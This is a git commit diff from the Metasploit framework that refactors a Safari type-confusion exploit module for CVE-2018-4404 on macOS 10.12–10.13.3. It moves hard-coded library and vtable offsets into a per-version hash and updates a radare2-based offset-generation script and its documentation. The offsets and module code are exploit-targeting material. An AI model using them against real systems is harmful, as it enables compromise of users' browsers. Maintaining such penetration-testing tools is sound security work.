move offsets to hash

fix
2018-11-20 17:51:49 +08:00 · 2018-11-20 17:51:49 +08:00 · 57bad6b213
parent bee3c3d4d3
commit 57bad6b213
3 changed files with 57 additions and 35 deletions
--- a/documentation/modules/exploit/osx/browser/safari_proxy_object_type_confusion.md
+++ b/documentation/modules/exploit/osx/browser/safari_proxy_object_type_confusion.md
@ -66,13 +66,16 @@ You will need to install the latest radare2 for the script to function.
 ```
 $ git clone https://github.com/radare/radare2 && cd radare2 && ./sys/install.sh && cd ..`
 $ ruby external/source/exploits/CVE-2018-4404/gen_offsets.rb
-const DYLD_STUB_LOADER_OFFSET = 0x000012a8;
-const DLOPEN_OFFSET = 0x00002e60;
-const CONFSTR_OFFSET = 0x000024fc;
-const STRLEN_OFFSET = 0x00001440;
-const STRLEN_GOT_OFFSET = 0xee8;
+      '10.13' => {
+        :dyld_stub_loader => '0x000012a8',
+        :dlopen => '0x00002e60',
+        :confstr => '0x000024fc',
+        :strlen => '0x00001440',
+        :strlen_got => '0xee8',
+      },
 ```

+The offset `:jsc_vtab` cannot be generated but you can guess it is either 0xe000 or 0xd000.
 You can then add the offsets to the module:
 `modules/exploits/osx/browser/safari_proxy_object_type_confusion.rb`

--- a/external/source/exploits/CVE-2018-4404/gen_offsets.rb
+++ b/external/source/exploits/CVE-2018-4404/gen_offsets.rb
@ -9,10 +9,12 @@ def grab_offset(lib_file, function)
  offset_string[0..9]
 end

-puts "const DYLD_STUB_LOADER_OFFSET = #{grab_offset("/usr/lib/system/libdyld.dylib", "dyld_stub_binder")};"
-puts "const DLOPEN_OFFSET = #{grab_offset("/usr/lib/system/libdyld.dylib", "sym._dlopen")};"
-puts "const CONFSTR_OFFSET = #{grab_offset("/usr/lib/system/libsystem_c.dylib", "sym._confstr")};"
-puts "const STRLEN_OFFSET = #{grab_offset("/usr/lib/system/libsystem_c.dylib", "sym._strlen")};"
+version = `sw_vers -productVersion`.strip
+puts "      '#{version}' => {"
+puts "        :dyld_stub_loader => '#{grab_offset("/usr/lib/system/libdyld.dylib", "dyld_stub_binder")}',"
+puts "        :dlopen => '#{grab_offset("/usr/lib/system/libdyld.dylib", "sym._dlopen")}',"
+puts "        :confstr => '#{grab_offset("/usr/lib/system/libsystem_c.dylib", "sym._confstr")}',"
+puts "        :strlen => '#{grab_offset("/usr/lib/system/libsystem_c.dylib", "sym._strlen")}',"

 strlen_disasm = `r2 -2qQ -c "iS | grep nl_symbol_ptr; s sym.imp.strlen; pd 1" /System/Library/Frameworks/JavaScriptCore.framework/JavaScriptCore`
 #strlen_disasm = '''
@ -23,5 +25,6 @@ strlen_disasm = `r2 -2qQ -c "iS | grep nl_symbol_ptr; s sym.imp.strlen; pd 1" /S
 got_offset = strlen_disasm.split(" ")[3].to_i(16)
 strlen_got_entry = strlen_disasm.scan(/\[(\S+)\]/).first.first.to_i(16)
 strlen_got_offset = (strlen_got_entry - got_offset).to_s(16)
-puts "const STRLEN_GOT_OFFSET = 0x#{strlen_got_offset};"
+puts "        :strlen_got => '0x#{strlen_got_offset}',"
+puts "      },"

--- a/modules/exploits/osx/browser/safari_proxy_object_type_confusion.rb
+++ b/modules/exploits/osx/browser/safari_proxy_object_type_confusion.rb
@ -43,6 +43,35 @@ class MetasploitModule < Msf::Exploit::Remote
      'DisclosureDate' => 'Mar 15 2018'))
  end

+  def offset_table
+    {
+      '10.12.6' => {
+        :jsc_vtab => '0x0000d8d8',
+        :dyld_stub_loader => '0x00001168',
+        :dlopen => '0x000027f7',
+        :confstr => '0x00002c84',
+        :strlen => '0x00001b40',
+        :strlen_got => '0xdc0',
+      },
+      '10.13' => {
+        :jsc_vtab => '0x0000e5f8',
+        :dyld_stub_loader => '0x000012a8',
+        :dlopen => '0x00002e60',
+        :confstr => '0x000024fc',
+        :strlen => '0x00001440',
+        :strlen_got => '0xee8',
+      },
+      '10.13.3' => {
+        :jsc_vtab => '0xe5e8',
+        :dyld_stub_loader => '0x1278',
+        :dlopen => '0x2e30',
+        :confstr => '0x24dc',
+        :strlen => '0x1420',
+        :strlen_got => '0xee0',
+      },
+    }
+  end
+
  def exploit_data(directory, file)
    path = ::File.join Msf::Config.data_directory, 'exploits', directory, file
    ::File.binread path
@ -66,35 +95,22 @@ class MetasploitModule < Msf::Exploit::Remote

  def get_offsets(user_agent)
    if user_agent =~ /Intel Mac OS X (.*?)\)/
-      mac_osx_version = Gem::Version.new($1.gsub("_", "."))
+      version = $1.gsub("_", ".")
+      mac_osx_version = Gem::Version.new(version)
      if mac_osx_version >= Gem::Version.new('10.13.4')
        print_warning "macOS version #{mac_osx_version} is not vulnerable"
      elsif mac_osx_version < Gem::Version.new('10.12')
        print_warning "macOS version #{mac_osx_version} is not vulnerable"
-      elsif mac_osx_version == Gem::Version.new('10.12.6')
-        return '''
-const JSC_VTAB_OFFSET = 0xd8d8;
-const DYLD_STUB_LOADER_OFFSET = 0x00001168;
-const DLOPEN_OFFSET = 0x000027f7;
-const CONFSTR_OFFSET = 0x00002c84;
-const STRLEN_OFFSET = 0x00001b40;
-const STRLEN_GOT_OFFSET = 0xdc0;'''
-      elsif mac_osx_version == Gem::Version.new('10.13')
-        return '''
-const JSC_VTAB_OFFSET = 0xe5f8;
-const DYLD_STUB_LOADER_OFFSET = 0x12a8;
-const STRLEN_GOT_OFFSET = 0xee8;
-const STRLEN_OFFSET = 0x1440;
-const CONFSTR_OFFSET = 0x24fc;
-const DLOPEN_OFFSET = 0x2e60;'''
-      elsif mac_osx_version == Gem::Version.new('10.13.3')
-        return '''
-const JSC_VTAB_OFFSET = 0xe5e8;
-const DYLD_STUB_LOADER_OFFSET = 0x1278;
-const STRLEN_GOT_OFFSET = 0xee0;
-const STRLEN_OFFSET = 0x1420;
-const CONFSTR_OFFSET = 0x24dc;
-const DLOPEN_OFFSET = 0x2e30;'''
+      elsif offset_table.key?(version)
+        offset = offset_table[version]
+        return <<-EOF
+const JSC_VTAB_OFFSET = #{offset[:jsc_vtab]};
+const DYLD_STUB_LOADER_OFFSET = #{offset[:dyld_stub_loader]};
+const DLOPEN_OFFSET = #{offset[:dlopen]};
+const CONFSTR_OFFSET = #{offset[:confstr]};
+const STRLEN_OFFSET = #{offset[:strlen]};
+const STRLEN_GOT_OFFSET = #{offset[:strlen_got]};
+EOF
      else
        print_warning "No offsets for version #{mac_osx_version}"
      end